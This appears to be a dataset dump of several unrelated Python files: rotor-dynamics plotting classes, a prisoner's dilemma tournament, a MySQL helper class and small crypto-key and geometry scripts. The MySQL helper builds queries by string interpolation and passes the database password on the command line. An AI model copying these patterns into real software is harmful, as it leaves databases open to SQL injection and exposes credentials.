This function plots orbits for each node on the rotor system in a 3D view.
Parameters
----------
percentile : list, optional
Sequence of percentiles to compute, which must be
between 0 and 100 inclusive.
conf_interval : list, optional
Sequence of confidence intervals to compute, which must be
between 0 and 100 inclusive.
fig : Plotly graph_objects.Figure()
The figure object with the plot.
args : optional
Additional plot axes
kwargs : optional
Additional key word arguments can be passed to change the plot
(e.g. line=dict(width=4.0, color="royalblue"), opacity=1.0, ...)
*See Plotly Python Figure Reference for more information.
Returns
-------
fig : Plotly graph_objects.Figure()
The figure object with the plot.
"""
ndof = self.number_dof
default_values = dict(mode="lines")
conf_interval = np.sort(conf_interval)
percentile = np.sort(percentile)
for k, v in default_values.items():
kwargs.setdefault(k, v)
if fig is None:
fig = go.Figure()
line = np.zeros(len(self.nodes_pos))
fig.add_trace(
go.Scatter3d(
x=self.nodes_pos,
y=line,
z=line,
line=dict(width=2.0, color="black", dash="dashdot"),
showlegend=False,
mode="lines",
)
)
for j, n in enumerate(self.nodes_list):
x = np.ones(self.yout.shape[1]) * self.nodes_pos[n]
fig.add_trace(
go.Scatter3d(
x=x,
y=np.mean(self.yout[..., ndof * n], axis=0),
z=np.mean(self.yout[..., ndof * n + 1], axis=0),
line=dict(width=5, color="black"),
name="Mean",
legendgroup="mean",
showlegend=True if j == 0 else False,
hovertemplate=(
"Nodal Position: %{x:.2f}<br>"
+ "X - Amplitude: %{y:.2e}<br>"
+ "Y - Amplitude: %{z:.2e}"
),
**kwargs,
)
)
for i, p in enumerate(percentile):
fig.add_trace(
go.Scatter3d(
x=x,
y=np.percentile(self.yout[..., ndof * n], p, axis=0),
z=np.percentile(self.yout[..., ndof * n + 1], p, axis=0),
opacity=1.0,
name="percentile: {}%".format(p),
line=dict(width=3, color=colors1[i]),
legendgroup="perc{}".format(p),
showlegend=True if j == 0 else False,
hovertemplate=(
"Nodal Position: %{x:.2f}<br>"
+ "X - Amplitude: %{y:.2e}<br>"
+ "Y - Amplitude: %{z:.2e}"
),
**kwargs,
)
)
for i, p in enumerate(conf_interval):
fig.add_trace(
go.Scatter3d(
x=x,
y=np.percentile(self.yout[..., ndof * n], 50 + p / 2, axis=0),
z=np.percentile(
self.yout[..., ndof * n + 1], 50 + p / 2, axis=0
),
line=dict(width=3.5, color=colors1[i]),
opacity=0.6,
name="confidence interval: {}%".format(p),
legendgroup="conf_interval{}".format(p),
showlegend=True if j == 0 else False,
hovertemplate=(
"Nodal Position: %{x:.2f}<br>"
+ "X - Amplitude: %{y:.2e}<br>"
+ "Y - Amplitude: %{z:.2e}"
),
**kwargs,
)
)
fig.add_trace(
go.Scatter3d(
x=x,
y=np.percentile(self.yout[..., ndof * n], 50 - p / 2, axis=0),
z=np.percentile(
self.yout[..., ndof * n + 1], 50 - p / 2, axis=0
),
line=dict(width=3.5, color=colors1[i]),
opacity=0.6,
name="confidence interval: {}%".format(p),
legendgroup="conf_interval{}".format(p),
showlegend=False,
hovertemplate=(
"Nodal Position: %{x:.2f}<br>"
+ "X - Amplitude: %{y:.2e}<br>"
+ "Y - Amplitude: %{z:.2e}"
),
**kwargs,
)
)
fig.update_layout(
scene=dict(
xaxis=dict(title=dict(text="<b>Rotor Length</b>"), showspikes=False),
yaxis=dict(title=dict(text="<b>Amplitude - X</b>"), showspikes=False),
zaxis=dict(title=dict(text="<b>Amplitude - Y</b>"), showspikes=False),
),
)
return fig
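# Hedged usage sketch for ST_TimeResponseResults (shapes are assumptions based on
# how yout is indexed above: (n_samples, n_timesteps, n_dofs); probes are tuples of
# (node, orientation angle in rad)):
#
#     t = np.linspace(0, 10, 1000)
#     yout = np.random.rand(10, 1000, 4 * 7) * 1e-4   # 10 samples, 7 nodes, 4 dof per node
#     xout = np.zeros_like(yout)
#     res = ST_TimeResponseResults(t, yout, xout, 4, list(range(7)), np.linspace(0, 1.5, 7))
#     fig = res.plot_1d(probe=[(3, 0.0)], conf_interval=[90])
#     fig.show()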
class ST_ForcedResponseResults:
"""Store stochastic results and provide plots for Forced Response.
Parameters
----------
forced_resp : array
Array with the force response for each node for each frequency.
frequency_range : array
Array with the frequencies.
magnitude : array
Magnitude of the frequency response for each node for each frequency.
phase : array
Phase of the frequency response for each node for each frequency.
number_dof : int
Number of degrees of freedom per shaft element's node.
Returns
-------
subplots : Plotly graph_objects.make_subplots()
Plotly figure with amplitude vs frequency phase angle vs frequency.
"""
def __init__(self, forced_resp, magnitude, phase, frequency_range, number_dof):
self.forced_resp = forced_resp
self.magnitude = magnitude
self.phase = phase
self.frequency_range = frequency_range
self.number_dof = number_dof
def plot_magnitude(
self,
probe,
percentile=[],
conf_interval=[],
fig=None,
units="mic-pk-pk",
**kwargs,
):
"""Plot frequency response.
This method plots the unbalance response magnitude.
Parameters
----------
probe : list of tuples
List with tuples (node, orientation angle).
node : int
indicate the node where the probe is located.
orientation : float,
probe orientation angle about the shaft. The 0 refers to +X direction.
percentile : list, optional
Sequence of percentiles to compute, which must be between
0 and 100 inclusive.
conf_interval : list, optional
Sequence of confidence intervals to compute, which must be between
0% and 100% inclusive.
fig : Plotly graph_objects.Figure()
The figure object with the plot.
units : str, optional
Unit system
Default is "mic-pk-pk".
kwargs : optional
Additional key word arguments can be passed to change the plot layout
(e.g. width=800, height=600, ...).
*See Plotly Python Figure Reference for more information.
Returns
-------
fig : Plotly graph_objects.Figure()
The figure object with the plot.
"""
if units == "m":
y_axis_label = "<b>Amplitude (m)</b>"
elif units == "mic-pk-pk":
y_axis_label = "<b>Amplitude (μ pk-pk)</b>"
else:
y_axis_label = "<b>Amplitude (dB)</b>"
conf_interval = np.sort(conf_interval)
percentile = np.sort(percentile)
if fig is None:
fig = go.Figure()
color_i = 0
color_p = 0
for i, p in enumerate(probe):
dofx = p[0] * self.number_dof
dofy = p[0] * self.number_dof + 1
angle = p[1]
# fmt: off
operator = np.array(
[[np.cos(angle), - np.sin(angle)],
[np.cos(angle), + np.sin(angle)]]
)
probe_resp = np.zeros_like(self.magnitude[:, :, 0])
for j, mag in enumerate(self.magnitude):
_probe_resp = operator @ np.vstack((mag[:, dofx], mag[:, dofy]))
probe_resp[j] = np.sqrt((_probe_resp[0] * np.cos(angle)) ** 2 +
(_probe_resp[1] * np.sin(angle)) ** 2)
# fmt: on
fig.add_trace(
go.Scatter(
x=self.frequency_range,
y=np.mean(probe_resp, axis=0),
opacity=1.0,
mode="lines",
line=dict(width=3, color=list(tableau_colors)[i]),
name=f"Probe {i + 1} - Mean",
legendgroup=f"Probe {i + 1} - Mean",
hovertemplate="Frequency: %{x:.2f}<br>Amplitude: %{y:.2e}",
)
)
for j, p in enumerate(percentile):
fig.add_trace(
go.Scatter(
x=self.frequency_range,
y=np.percentile(probe_resp, p, axis=0),
opacity=0.6,
mode="lines",
line=dict(width=2.5, color=colors1[color_p]),
name=f"Probe {i + 1} - percentile: {p}%",
legendgroup=f"Probe {i + 1} - percentile: {p}%",
hovertemplate="Frequency: %{x:.2f}<br>Amplitude: %{y:.2e}",
)
)
color_p += 1
x = np.concatenate((self.frequency_range, self.frequency_range[::-1]))
for j, p in enumerate(conf_interval):
p1 = np.percentile(probe_resp, 50 + p / 2, axis=0)
p2 = np.percentile(probe_resp, 50 - p / 2, axis=0)
fig.add_trace(
go.Scatter(
x=x,
y=np.concatenate((p1, p2[::-1])),
mode="lines",
line=dict(width=1, color=colors2[color_i]),
fill="toself",
fillcolor=colors2[color_i],
opacity=0.5,
name=f"Probe {i + 1} - confidence interval: {p}%",
legendgroup=f"Probe {i + 1} - confidence interval: {p}%",
hovertemplate="Frequency: %{x:.2f}<br>Amplitude: %{y:.2e}",
)
)
color_i += 1
fig.update_xaxes(title_text="<b>Frequency</b>")
fig.update_yaxes(title_text=y_axis_label)
fig.update_layout(**kwargs)
return fig
def plot_phase(self, probe, percentile=[], conf_interval=[], fig=None, **kwargs):
"""Plot frequency response.
This method plots the phase response given a set of probes.
Parameters
----------
probe : list of tuples
List with tuples (node, orientation angle).
node : int
indicate the node where the probe is located.
orientation : float,
probe orientation angle about the shaft. The 0 refers to +X direction.
percentile : list, optional
Sequence of percentiles to compute, which must be between
0 and 100 inclusive.
conf_interval : list, optional
Sequence of confidence intervals to compute, which must be between
0 and 100 inclusive.
fig : Plotly graph_objects.Figure()
The figure object with the plot.
kwargs : optional
Additional key word arguments can be passed to change the plot layout
(e.g. width=800, height=600, ...).
*See Plotly Python Figure Reference for more information.
Returns
-------
fig : Plotly graph_objects.Figure()
The figure object with the plot.
"""
conf_interval = np.sort(conf_interval)
percentile = np.sort(percentile)
if fig is None:
fig = go.Figure()
color_p = 0
color_i = 0
for i, p in enumerate(probe):
probe_phase = np.zeros_like(self.phase[:, :, 0])
for j, phs in enumerate(self.phase):
aux_phase = phs[:, p[0] * self.number_dof]
probe_phase[j] = np.array(
[ang + 2 * np.pi if ang < 0 else ang for ang in aux_phase]
)
angle = p[1]
probe_phase = probe_phase - angle
fig.add_trace(
go.Scatter(
x=self.frequency_range,
y=np.mean(probe_phase, axis=0),
opacity=1.0,
mode="lines",
line=dict(width=3, color=list(tableau_colors)[i]),
name=f"Probe {i + 1} - Mean",
legendgroup=f"Probe {i + 1} - Mean",
hovertemplate="Frequency: %{x:.2f}<br>Phase: %{y:.2f}",
)
)
for j, p in enumerate(percentile):
fig.add_trace(
go.Scatter(
x=self.frequency_range,
y=np.percentile(probe_phase, p, axis=0),
opacity=0.6,
mode="lines",
line=dict(width=2.5, color=colors1[color_p]),
name=f"Probe {i + 1} - percentile: {p}%",
legendgroup=f"Probe {i + 1} - percentile: {p}%",
hovertemplate="Frequency: %{x:.2f}<br>Phase: %{y:.2f}",
)
)
color_p += 1
x = np.concatenate((self.frequency_range, self.frequency_range[::-1]))
for j, p in enumerate(conf_interval):
p1 = np.percentile(probe_phase, 50 + p / 2, axis=0)
p2 = np.percentile(probe_phase, 50 - p / 2, axis=0)
fig.add_trace(
go.Scatter(
x=x,
y=np.concatenate((p1, p2[::-1])),
mode="lines",
line=dict(width=1, color=colors2[color_i]),
fill="toself",
fillcolor=colors2[color_i],
opacity=0.5,
name=f"Probe {i + 1} - confidence interval: {p}%",
legendgroup=f"Probe {i + 1} - confidence interval: {p}%",
hovertemplate="Frequency: %{x:.2f}<br>Phase: %{y:.2f}",
)
)
color_i += 1
fig.update_xaxes(title_text="<b>Frequency</b>")
fig.update_yaxes(title_text="<b>Phase Angle</b>")
fig.update_layout(**kwargs)
return fig
def plot_polar_bode(
self,
probe,
percentile=[],
conf_interval=[],
fig=None,
units="mic-pk-pk",
**kwargs,
):
"""Plot polar forced response using Plotly.
Parameters
----------
probe : list of tuples
List with tuples (node, orientation angle).
node : int
indicate the node where the probe is located.
orientation : float,
probe orientation angle about the shaft. The 0 refers to +X direction.
percentile : list, optional
Sequence of percentiles to compute, which must be between
0 and 100 inclusive.
conf_interval : list, optional
Sequence of confidence intervals to compute, which must be between
0 and 100 inclusive.
fig : Plotly graph_objects.Figure()
The figure object with the plot.
units : str
Magnitude unit system.
Default is "mic-pk-pk"
kwargs : optional
Additional key word arguments can be passed to change the plot layout only
(e.g. width=1000, height=800, ...).
*See Plotly Python Figure Reference for more information.
Returns
-------
fig : Plotly graph_objects.Figure()
The figure object with the plot.
"""
conf_interval = np.sort(conf_interval)
percentile = np.sort(percentile)
if units == "m":
r_axis_label = "<b>Amplitude (m)</b>"
elif units == "mic-pk-pk":
r_axis_label = "<b>Amplitude (μ pk-pk)</b>"
else:
r_axis_label = "<b>Amplitude (dB)</b>"
if fig is None:
fig = go.Figure()
color_p = 0
color_i = 0
for i, p in enumerate(probe):
dofx = p[0] * self.number_dof
dofy = p[0] * self.number_dof + 1
angle = p[1]
# fmt: off
operator = np.array(
[[np.cos(angle), - np.sin(angle)],
[np.cos(angle), + np.sin(angle)]]
)
probe_resp = np.zeros_like(self.magnitude[:, :, 0])
for j, mag in enumerate(self.magnitude):
_probe_resp = operator @ np.vstack((mag[:, dofx], mag[:, dofy]))
probe_resp[j] = np.sqrt((_probe_resp[0] * np.cos(angle)) ** 2 +
(_probe_resp[1] * np.sin(angle)) ** 2)
# fmt: on
probe_phase = np.zeros_like(self.phase[:, :, 0])
for j, phs in enumerate(self.phase):
aux_phase = phs[:, p[0] * self.number_dof]
probe_phase[j] = np.array(
[ang + 2 * np.pi if ang < 0 else ang for ang in aux_phase]
)
angle = p[1]
probe_phase = probe_phase - angle
fig.add_trace(
go.Scatterpolar(
r=np.mean(probe_resp, axis=0),
theta=np.mean(probe_phase, axis=0),
customdata=self.frequency_range,
thetaunit="radians",
mode="lines",
line=dict(width=3.0, color=list(tableau_colors)[i]),
name=f"Probe {i + 1} - Mean",
legendgroup=f"Probe {i + 1} - Mean",
hovertemplate=(
"<b>Amplitude: %{r:.2e}</b><br>"
+ "<b>Phase: %{theta:.2f}</b><br>"
+ "<b>Frequency: %{customdata:.2f}</b>"
),
)
)
for j, p in enumerate(percentile):
fig.add_trace(
go.Scatterpolar(
r=np.percentile(probe_resp, p, axis=0),
theta=np.percentile(probe_phase, p, axis=0),
customdata=self.frequency_range,
thetaunit="radians",
opacity=0.6,
line=dict(width=2.5, color=colors1[color_p]),
name=f"Probe {i + 1} - percentile: {p}%",
legendgroup=f"Probe {i + 1} - percentile{p}",
hovertemplate=(
"<b>Amplitude: %{r:.2e}</b><br>"
+ "<b>Phase: %{theta:.2f}</b><br>"
+ "<b>Frequency: %{customdata:.2f}</b>"
),
)
)
color_p += 1
for j, p in enumerate(conf_interval):
p1 = np.percentile(probe_resp, 50 + p / 2, axis=0)
p2 = np.percentile(probe_resp, 50 - p / 2, axis=0)
p3 = np.percentile(probe_phase, 50 + p / 2, axis=0)
p4 = np.percentile(probe_phase, 50 - p / 2, axis=0)
fig.add_trace(
go.Scatterpolar(
r=np.concatenate((p1, p2[::-1])),
theta=np.concatenate((p3, p4[::-1])),
thetaunit="radians",
line=dict(width=1, color=colors2[color_i]),
fill="toself",
fillcolor=colors2[color_i],
opacity=0.5,
name=f"Probe {i + 1} - confidence interval: {p}%",
legendgroup=f"Probe {i + 1} - confidence interval: {p}%",
)
)
color_i += 1
fig.update_layout(
polar=dict(
radialaxis=dict(title_text=r_axis_label, exponentformat="E"),
angularaxis=dict(exponentformat="E"),
),
**kwargs,
)
return fig
def plot(
self,
probe,
percentile=[],
conf_interval=[],
fig=None,
units="mic-pk-pk",
**kwargs,
):
"""Plot frequency response.
This method plots the frequency and phase response given a set of probes.
Parameters
----------
probe : list of tuples
List with tuples (node, orientation angle).
percentile : list, optional
Sequence of percentiles to compute, which must be
between 0 and 100 inclusive.
conf_interval : list, optional
Sequence of confidence intervals to compute, which must be
between 0 and 100 inclusive.
units : str, optional
Unit system
Default is "mic-pk-pk"
kwargs : optional
Additional key word arguments can be passed to change the plot
(e.g. line=dict(width=4.0, color="royalblue"), opacity=1.0, ...)
*See Plotly Python Figure Reference for more information.
Returns
-------
subplots : Plotly graph_objects.make_subplots()
Plotly figure with amplitude vs frequency phase angle vs frequency.
"""
# fmt: off
fig0 = self.plot_magnitude(probe, percentile, conf_interval, units=units, **kwargs)
fig1 = self.plot_phase(probe, percentile, conf_interval, **kwargs)
fig2 = self.plot_polar_bode(probe, percentile, conf_interval, units=units, **kwargs)
if fig is None:
fig = make_subplots(
rows=2, cols=2, specs=[[{}, {"type": "polar", "rowspan": 2}], [{}, None]]
)
# fmt: on
for data in fig0["data"]:
data.showlegend = False
fig.add_trace(data, row=1, col=1)
for data in fig1["data"]:
data.showlegend = False
fig.add_trace(data, row=2, col=1)
for data in fig2["data"]:
fig.add_trace(data, row=1, col=2)
fig.update_xaxes(fig0.layout.xaxis, row=1, col=1)
fig.update_yaxes(fig0.layout.yaxis, row=1, col=1)
fig.update_xaxes(fig1.layout.xaxis, row=2, col=1)
fig.update_yaxes(fig1.layout.yaxis, row=2, col=1)
fig.update_layout(
polar=dict(
radialaxis=fig2.layout.polar.radialaxis,
angularaxis=fig2.layout.polar.angularaxis,
),
)
return fig
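# Hedged usage sketch for ST_ForcedResponseResults (shapes are assumptions from the
# indexing above: forced_resp, magnitude and phase are (n_samples, n_frequencies,
# n_dofs) arrays):
#
#     freqs = np.linspace(0, 500, 51)
#     mag = np.random.rand(10, 51, 4 * 7) * 1e-5
#     phs = np.random.rand(10, 51, 4 * 7) * np.pi
#     res = ST_ForcedResponseResults(forced_resp=mag, magnitude=mag, phase=phs,
#                                    frequency_range=freqs, number_dof=4)
#     fig = res.plot(probe=[(3, 0.0)], conf_interval=[90])
#     fig.show()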
| 2.203125 | 2 |
code/prisonersDilemma.py | ben9583/PrisonersDilemmaTournament | 1 | 3470 | import os
import itertools
import importlib
import numpy as np
import random
STRATEGY_FOLDER = "exampleStrats"
RESULTS_FILE = "results.txt"
pointsArray = [[1,5],[0,3]] # The i-j-th element of this array is how many points you receive if you play move i and your opponent plays move j.
moveLabels = ["D","C"]
# D = defect, betray, sabotage, free-ride, etc.
# C = cooperate, stay silent, comply, upload files, etc.
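# Example with the payoff matrix above: if you defect (0) while your opponent
# cooperates (1), you score pointsArray[0][1] == 5 and they score
# pointsArray[1][0] == 0; mutual cooperation pays pointsArray[1][1] == 3 each,
# and mutual defection pays pointsArray[0][0] == 1 each.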
# Returns a 2-by-n numpy array. The first axis is which player (0 = us, 1 = opponent)
# The second axis is which turn. (0 = first turn, 1 = next turn, etc.)
# For example, it might return
#
# [[0 0 1] a.k.a. D D C
# [1 1 1]] a.k.a. C C C
#
# if there have been 3 turns, and we have defected twice then cooperated once,
# and our opponent has cooperated all three times.
def getVisibleHistory(history, player, turn):
historySoFar = history[:,:turn].copy()
if player == 1:
historySoFar = np.flip(historySoFar,0)
return historySoFar
def runRound(pair):
moduleA = importlib.import_module(STRATEGY_FOLDER+"."+pair[0])
moduleB = importlib.import_module(STRATEGY_FOLDER+"."+pair[1])
memoryA = None
memoryB = None
LENGTH_OF_GAME = int(200-40*np.log(random.random())) # The games are a minimum of 200 turns long. The np.log here guarantees that every turn after the 200th has an equal (low) chance of being the final turn.
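# Note: -np.log(random.random()) is an Exponential(1) draw with mean 1, so the
# expected game length is roughly 200 + 40 = 240 turns.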
history = np.zeros((2,LENGTH_OF_GAME),dtype=int)
for turn in range(LENGTH_OF_GAME):
playerAmove, memoryA = moduleA.strategy(getVisibleHistory(history,0,turn),memoryA)
playerBmove, memoryB = moduleB.strategy(getVisibleHistory(history,1,turn),memoryB)
history[0,turn] = playerAmove
history[1,turn] = playerBmove
return history
def tallyRoundScores(history):
scoreA = 0
scoreB = 0
ROUND_LENGTH = history.shape[1]
for turn in range(ROUND_LENGTH):
playerAmove = history[0,turn]
playerBmove = history[1,turn]
scoreA += pointsArray[playerAmove][playerBmove]
scoreB += pointsArray[playerBmove][playerAmove]
return scoreA/ROUND_LENGTH, scoreB/ROUND_LENGTH
def outputRoundResults(f, pair, roundHistory, scoresA, scoresB):
f.write(pair[0]+" (P1) VS. "+pair[1]+" (P2)\n")
for p in range(2):
for t in range(roundHistory.shape[1]):
move = roundHistory[p,t]
f.write(moveLabels[move]+" ")
f.write("\n")
f.write("Final score for "+pair[0]+": "+str(scoresA)+"\n")
f.write("Final score for "+pair[1]+": "+str(scoresB)+"\n")
f.write("\n")
def pad(stri, leng):
result = stri
for i in range(len(stri),leng):
result = result+" "
return result
def runFullPairingTournament(inFolder, outFile):
print("Starting tournament, reading files from "+inFolder)
scoreKeeper = {}
STRATEGY_LIST = []
for file in os.listdir(inFolder):
if file.endswith(".py"):
STRATEGY_LIST.append(file[:-3])
for strategy in STRATEGY_LIST:
scoreKeeper[strategy] = 0
f = open(outFile,"w+")
for pair in itertools.combinations(STRATEGY_LIST, r=2):
roundHistory = runRound(pair)
scoresA, scoresB = tallyRoundScores(roundHistory)
outputRoundResults(f, pair, roundHistory, scoresA, scoresB)
scoreKeeper[pair[0]] += scoresA
scoreKeeper[pair[1]] += scoresB
scoresNumpy = np.zeros(len(scoreKeeper))
for i in range(len(STRATEGY_LIST)):
scoresNumpy[i] = scoreKeeper[STRATEGY_LIST[i]]
rankings = np.argsort(scoresNumpy)
f.write("\n\nTOTAL SCORES\n")
for rank in range(len(STRATEGY_LIST)):
i = rankings[-1-rank]
score = scoresNumpy[i]
scorePer = score/(len(STRATEGY_LIST)-1)
f.write("#"+str(rank+1)+": "+pad(STRATEGY_LIST[i]+":",16)+' %.3f'%score+' (%.3f'%scorePer+" average)\n")
f.flush()
f.close()
print("Done with everything! Results file written to "+RESULTS_FILE)
runFullPairingTournament(STRATEGY_FOLDER, RESULTS_FILE)
| 3.75 | 4 |
json_to_relation/mysqldb.py | paepcke/json_to_relation | 4 | 3471 | # Copyright (c) 2014, Stanford University
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
# 3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
'''
Created on Sep 24, 2013
@author: paepcke
Modifications:
- Dec 30, 2013: Added closing of connection to close() method
'''
import re
import subprocess
import tempfile
import pymysql
#import MySQLdb
class MySQLDB(object):
'''
Shallow interface to MySQL databases. Some niceties nonetheless.
The query() method is an iterator. So::
for result in mySqlObj.query('SELECT * FROM foo'):
print result
'''
def __init__(self, host='127.0.0.1', port=3306, user='root', passwd='', db='mysql'):
'''
:param host: MySQL host
:type host: string
:param port: MySQL host's port
:type port: int
:param user: user to log in as
:type user: string
:param passwd: password to use for given user
:type passwd: string
:param db: database to connect to within server
:type db: string
'''
# If all arguments are set to None, we are unittesting:
if all(arg is None for arg in (host,port,user,passwd,db)):
return
self.user = user
        self.pwd = passwd
self.db = db
self.cursors = []
try:
            self.connection = pymysql.connect(host=host, port=port, user=user, passwd=passwd, db=db)
#self.connection = MySQLdb.connect(host=host, port=port, user=user, passwd=passwd, db=db, local_infile=1)
#except MySQLdb.OperationalError:
except pymysql.OperationalError:
pwd = '...............' if len(passwd) > 0 else '<no password>'
raise ValueError('Cannot reach MySQL server with host:%s, port:%s, user:%s, pwd:%s, db:%s' %
(host, port, user, pwd, db))
def close(self):
'''
Close all cursors that are currently still open.
'''
for cursor in self.cursors:
try:
cursor.close()
except:
pass
try:
self.connection.close()
except:
pass
def createTable(self, tableName, schema):
'''
Create new table, given its name, and schema.
        The schema is a dict mapping column names to
column types. Example: {'col1' : 'INT', 'col2' : 'TEXT'}
:param tableName: name of new table
:type tableName: String
:param schema: dictionary mapping column names to column types
:type schema: Dict<String,String>
'''
colSpec = ''
for colName, colVal in schema.items():
colSpec += str(colName) + ' ' + str(colVal) + ','
cmd = 'CREATE TABLE IF NOT EXISTS %s (%s) ' % (tableName, colSpec[:-1])
cursor = self.connection.cursor()
try:
cursor.execute(cmd)
self.connection.commit()
finally:
cursor.close()
def dropTable(self, tableName):
'''
Delete table safely. No errors
:param tableName: name of table
:type tableName: String
'''
cursor = self.connection.cursor()
try:
cursor.execute('DROP TABLE IF EXISTS %s' % tableName)
self.connection.commit()
finally:
cursor.close()
def truncateTable(self, tableName):
'''
Delete all table rows. No errors
:param tableName: name of table
:type tableName: String
'''
cursor = self.connection.cursor()
try:
cursor.execute('TRUNCATE TABLE %s' % tableName)
self.connection.commit()
finally:
cursor.close()
def insert(self, tblName, colnameValueDict):
'''
Given a dictionary mapping column names to column values,
insert the data into a specified table
:param tblName: name of table to insert into
:type tblName: String
:param colnameValueDict: mapping of column name to column value
:type colnameValueDict: Dict<String,Any>
'''
colNames, colValues = zip(*colnameValueDict.items())
cursor = self.connection.cursor()
try:
cmd = 'INSERT INTO %s (%s) VALUES (%s)' % (str(tblName), ','.join(colNames), self.ensureSQLTyping(colValues))
cursor.execute(cmd)
self.connection.commit()
finally:
cursor.close()
def bulkInsert(self, tblName, colNameTuple, valueTupleArray):
'''
Inserts large number of rows into given table. Strategy: write
        the values to a temp file, then generate a LOAD DATA LOCAL INFILE
MySQL command. Execute that command via subprocess.call().
Using a cursor.execute() fails with error 'LOAD DATA LOCAL
is not supported in this MySQL version...' even though MySQL
is set up to allow the op (load-infile=1 for both mysql and
mysqld in my.cnf).
:param tblName: table into which to insert
:type tblName: string
:param colNameTuple: tuple containing column names in proper order, i.e. \
corresponding to valueTupleArray orders.
:type colNameTuple: (str[,str[...]])
:param valueTupleArray: array of n-tuples, which hold the values. Order of\
        values must correspond to order of column names in colNameTuple.
:type valueTupleArray: [(<anyMySQLCompatibleTypes>[<anyMySQLCompatibleTypes,...]])
'''
tmpCSVFile = tempfile.NamedTemporaryFile(dir='/tmp',prefix='userCountryTmp',suffix='.csv')
for valueTuple in valueTupleArray:
tmpCSVFile.write(','.join(valueTuple) + '\n')
try:
# Remove quotes from the values inside the colNameTuple's:
mySQLColNameList = re.sub("'","",str(colNameTuple))
mySQLCmd = "USE %s; LOAD DATA LOCAL INFILE '%s' INTO TABLE %s FIELDS TERMINATED BY ',' OPTIONALLY ENCLOSED BY '\"' LINES TERMINATED BY '\\n' %s" %\
(self.db, tmpCSVFile.name, tblName, mySQLColNameList)
subprocess.call(['mysql', '-u', self.user, '-p%s'%self.pwd, '-e', mySQLCmd])
finally:
tmpCSVFile.close()
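    # Illustrative usage sketch (table, column, and value names below are made up):
    #
    #   db.bulkInsert('people', ('id', 'name'), [('1', 'Alice'), ('2', 'Bob')])
    #
    # The tuples are written to a temporary CSV and loaded via LOAD DATA LOCAL INFILE
    # through the mysql command-line client, so every value must already be a string.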
def update(self, tblName, colName, newVal, fromCondition=None):
'''
Update one column with a new value.
:param tblName: name of table in which update is to occur
:type tblName: String
:param colName: column whose value is to be changed
:type colName: String
:param newVal: value acceptable to MySQL for the given column
:type newVal: type acceptable to MySQL for the given column
:param fromCondition: optionally condition that selects which rows to update.\
if None, the named column in all rows are updated to\
the given value. Syntax must conform to what may be in\
a MySQL FROM clause (don't include the 'FROM' keyword)
:type fromCondition: String
'''
cursor = self.connection.cursor()
try:
if fromCondition is None:
cmd = "UPDATE %s SET %s = '%s';" % (tblName,colName,newVal)
else:
cmd = "UPDATE %s SET %s = '%s' WHERE %s;" % (tblName,colName,newVal,fromCondition)
cursor.execute(cmd)
self.connection.commit()
finally:
cursor.close()
def ensureSQLTyping(self, colVals):
'''
Given a list of items, return a string that preserves
MySQL typing. Example: (10, 'My Poem') ---> '10, "My Poem"'
Note that ','.join(map(str,myList)) won't work:
(10, 'My Poem') ---> '10, My Poem'
:param colVals: list of column values destined for a MySQL table
:type colVals: <any>
'''
resList = []
for el in colVals:
if isinstance(el, basestring):
resList.append('"%s"' % el)
else:
resList.append(el)
return ','.join(map(str,resList))
def query(self, queryStr):
'''
Query iterator. Given a query, return one result for each
subsequent call.
:param queryStr: query
:type queryStr: String
'''
cursor = self.connection.cursor()
# For if caller never exhausts the results by repeated calls:
self.cursors.append(cursor)
cursor.execute(queryStr)
while True:
nextRes = cursor.fetchone()
if nextRes is None:
cursor.close()
return
yield nextRes
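# Illustrative usage sketch (assumes a reachable MySQL server; credentials and names are made up):
#
#   db = MySQLDB(host='127.0.0.1', port=3306, user='root', passwd='secret', db='test')
#   db.createTable('people', {'id': 'INT', 'name': 'TEXT'})
#   db.insert('people', {'id': 10, 'name': 'My Poem'})
#   for row in db.query('SELECT * FROM people'):
#       print(row)
#   db.close()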
| 1.625 | 2 |
tools/xkeydump.py | treys/crypto-key-derivation | 29 | 3472 |
#!./venv/bin/python
from lib.mbp32 import XKey
from lib.utils import one_line_from_stdin
xkey = XKey.from_xkey(one_line_from_stdin())
print(xkey)
print("Version:", xkey.version)
print("Depth:", xkey.depth)
print("Parent FP:", xkey.parent_fp.hex())
print("Child number:", xkey.child_number_with_tick())
print("Chain code:", xkey.chain_code.hex())
print("Key:", xkey.key)
if xkey.key.get_private_bytes():
print("Private bytes:", xkey.key.get_private_bytes().hex())
print("Public bytes:", xkey.key.get_public_bytes().hex())
print("Key ID:", xkey.keyid().hex())
print("XKey:", xkey.to_xkey().decode('ascii'))
| 2.21875 | 2 |
examples/compute_angular_resolution.py | meder411/Tangent-Images | 57 | 3473 | from spherical_distortion.util import *
sample_order = 9 # Input resolution to examine
def ang_fov(s):
print('Spherical Resolution:', s)
for b in range(s):
dim = tangent_image_dim(b, s) # Pixel dimension of tangent image
corners = tangent_image_corners(b, s) # Corners of each tangent image
fov_x, fov_y = compute_tangent_image_angular_resolution(corners)
print(' At base level', b)
print(' FOV (x) =', fov_x)
print(' FOV (y) =', fov_y)
print(' deg/pix (x) =', fov_x/dim)
print(' deg/pix (y) =', fov_y/dim)
ang_fov(sample_order) | 2.984375 | 3 |
polymath/srdfg/base.py | he-actlab/polymath | 15 | 3474 |
